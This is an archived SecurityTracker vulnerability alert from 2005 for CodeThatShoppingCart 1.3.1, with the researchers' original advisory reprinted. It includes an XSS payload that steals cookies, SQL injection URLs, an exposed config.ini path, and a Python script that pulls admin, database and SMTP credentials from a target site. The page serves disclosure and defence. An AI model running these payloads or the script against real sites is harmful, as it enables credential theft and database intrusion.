SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Commerce)  >   CodeThatShoppingCart Vendors:   CodeThat.com
CodeThatShoppingCart Input Validation Holes Permit SQL Injection and Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1013924
SecurityTracker URL:  http://securitytracker.com/id/1013924
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 9 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 1.3.1
Description:   Lostmon and icaro reported several vulnerabilities in CodeThatShoppingCart. A remote user can inject SQL commands and conduct cross-site scripting attacks. A remote user can also obtain some configuration data.

The 'catalog.php' script does not properly validate user-supplied input in the 'id' parameter. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the CodeThatShoppingCart software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/codethat/catalog.php?action=category_show&id=2"><script>alert(document.cookie)</script>

A remote user can also supply specially crafted 'id' parameter values to execute SQL commands on the underlying database.

Some demonstration exploit URLs are provided:

http://[target]/shoppingcart/catalog.php?action=category_show&id=1%20or%20like%20%60a%%60

http://[target]/demo/catalog.php?action=category_show&id=1%20or%201=1

A remote user can supply the following type of URL to obtain SMTP configuration information, the SQL username, password, and host, and the administrator's username and hashed password.

http://[target]/shoppingcart/config.ini

The vendor was notified on May 7, 2005.

Impact:   A remote user can execute SQL commands on the underlying database.

A remote user can determine SMTP configuration information, the SQL username, password, and host, and the administrator's username and hashed password.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the CodeThatShoppingCart software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.codethat.com/shoppingcart/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  CodeThat ShoppingCart Critical information disclosure XSS and SQL injection


##########################################################
CodeThat ShoppingCart Critical information disclosure 
XSS and SQL injection
vendor Url: http://www.codethat.com/shoppingcart/
advisore:http://lostmon.blogspot.com/2005/05/
codethat-shoppingcart-critical.html
vendor notifY: yes exploit available: yes
Discovered By Lostmon And icaro exploit code by icaro
############################################################

CodeThat ShoppingCart  contains a flaw that may lead to an
unauthorized disclosure of SQL conection data.It is possible
to gain access to plain text SQL configuration details, this
could allow a user to create a specially crafted URL to access 
'config.ini' file, which may lead to a loss of confidentiality.
hash.(automated exploit available) and the credential for 
configuration  of SMTP server.

Contains a flaw too that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
'id' variables upon submission to the catalog.php scripts.This 
could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a loss 
of integrity.

All flaws are found by Lostmon (lostmon@gmail.com) 
and icaro (icaro0@gmail.com)and exploit code is coded
by icaro from http://www.badchecksum.tk 

##########
versions:
##########

1.3.1

###########
Solution
###########

no solution at this time

############
Timeline
############

discovered: 6 may 2005
vendor notify: 7 may 2005
vendor response: 8 may 2005 (automated response form spamarrest)
vendor fix:
disclosure:9 may 2005

##########
examples:
####################
Cross site scripting
####################

http://[victim]/codethat/catalog.php?action=category_show
&id=2"><script>alert(document.cookie)</script>

###############
SQL injections
###############

http://[victim]/shoppingcart/catalog.php?action=category_show
&id=1%20or%20like%20%60a%%60 

nice SQL error/response ...

umm them try to list all products:

http://[victim]shoppingcart/demo/catalog.php?action=
category_show&id=1%20or%201=1

command execution sucesfully !!!!

aparently, non critical SQL injection ,the data base only have
tree tables and no passwords or other information are stored 
in the database.


##############################
Critical information disclosure
Exploit code include.
###############################

A remote user can access directly to SQL user name, password
host, and all details about SQL configuration.



http://[victim]/shoppingcart/config.ini

##############################
Critical information disclosure.
###############################

A remote user can access directly to SQL user name, password
host, and all details about SQL configuration.


A remote user can obtain information about  SMTP  configuration.

http://[victim]/shoppingcart/config.ini

#############################################
Proof of concept automated exploit in Python
#############################################

#                Lostmon Dismarking tm && icaro Badchecksum tm
#                Extract information tool exploit
#                Coded by icaro, Discovered by lostmon && icaro
import httplib
import sys
import string
import socket
import os
def uso():
       print '\n\n\nLOSTMON DISMARKING && ICARO BADCHECKSUM TEAM\n'
       print 'Usage: python ' + sys.argv[0] + ' host
/directory_of_shoping_cart/\n'
       print 'Example: python '+ sys.argv[0] +' www.myhost.com /shoping/\n'
def leeini(direccionweb,directorioshoping):
       web=httplib.HTTP(direccionweb)
       web.putrequest('GET',directorioshoping+'config.ini')
       web.putheader('Host',direccionweb)
       web.putheader('Accept', 'text/html')
       web.putheader('Accept', 'text/plain')
       web.endheaders()
       errcode, errmsg, headers = web.getreply()
       fichero=web.getfile()
       datos=fichero.read()
       f=open('tmp.txt','w')
       f.write(datos)
       f.close
       f=open('tmp.txt','r')
       lineas=f.readlines()
       f.close
       n=0
       print 'EXTRACCION DE PASSWD DE ADMIN SHOPING CART\n'
       while n<len(lineas):
               if (string.find(lineas[n],'admin_username'))==0:
                      
imprime=string.replace(lineas[n],'admin_username : string ','Login ')
                       print imprime
               if (string.find(lineas[n],'admin_password'))==0:
                      
imprime=string.replace(lineas[n],'admin_password : string ','Passwd ')
                       print imprime
               n=n+1
       n=0
       print 'EXTRACCION DE INFORMACION DE BASE DE DATOS\n'
       while n<len(lineas):
               if (string.find(lineas[n],'driver : string '))==0:
                       imprime=string.replace(lineas[n],'driver :
string ','Tipo')
                       print imprime
               if (string.find(lineas[n],'server : string '))==0:
                       imprime=string.replace(lineas[n],'server :
string ','Servidor ')
                       print imprime
               if (string.find(lineas[n],'user : string '))==0:
                       imprime=string.replace(lineas[n],'user : string
','Usuario ')
                       print imprime
               if (string.find(lineas[n],'password : string '))==0:
                       imprime=string.replace(lineas[n],'password :
string ','Passwd ')
                       print imprime
               if (string.find(lineas[n],'database : string '))==0:
                       imprime=string.replace(lineas[n],'database :
string ','Base de datos ')
                       print imprime
               n=n+1
       n=0
       print 'EXTRACCION DE INFORMACION DEL SERVIDOR SMTP\n'
       while n<len(lineas):
               if (string.find(lineas[n],'checkout_email : string '))==0:
                      
imprime=string.replace(lineas[n],'checkout_email : string ','Email
del admin ')
                       print imprime
               if (string.find(lineas[n],'from_name : string '))==0:
                       imprime=string.replace(lineas[n],'from_name :
string ','Nombre')
                       print imprime
               if (string.find(lineas[n],'smtp_host : string '))==0:
                       imprime=string.replace(lineas[n],'smtp_host :
string ','Host ')
                       print imprime
               if (string.find(lineas[n],'smtp_username : string '))==0:
                       imprime=string.replace(lineas[n],'smtp_username
: string ','Usuario ')
                       print imprime
               if (string.find(lineas[n],'smtp_password : string '))==0:
                       imprime=string.replace(lineas[n],'smtp_password
: string ','Passwd ')
                       print imprime
               n=n+1

if len(sys.argv)==3:
       leeini(sys.argv[1],sys.argv[2])
       os.remove('tmp.txt')
else:
       uso()

####################### end ##############

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
thnx to icaro he is with me and investigate.

--
atentamente:

Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente....
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC